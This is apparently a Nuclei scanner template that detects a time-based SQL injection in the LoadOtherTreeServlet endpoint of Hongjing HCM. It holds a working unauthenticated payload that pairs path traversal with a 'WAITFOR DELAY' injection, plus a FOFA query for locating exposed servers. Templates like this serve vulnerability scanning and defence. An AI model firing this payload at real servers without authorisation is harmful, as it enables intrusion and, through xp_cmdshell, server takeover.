id: hjsoft-hcm-tb-sqli

info:
  name: Hongjing HCM - Time-Based Sql Injection
  author: securityforeveryone
  severity: high
  description: |
    There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3LoadOtherTreeServlet%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="HJSOFT-HCM"
  tags: sqli,hjsoft,management-system

http:
  - raw:
      - |
        @timeout: 20s
        GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains_all(body,"TreeNode","tab_id")'
          - 'contains(header,"text/xml")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008487f7999fa553bab3563df81495c9656a7959996091429dd5766ab506c198c0022100f8edadd2fa4f855af54c21c8f9d62b72a3ad53c82ba3196c1c969e492e1368fa:922c64590222798bb761d5b6d8e72950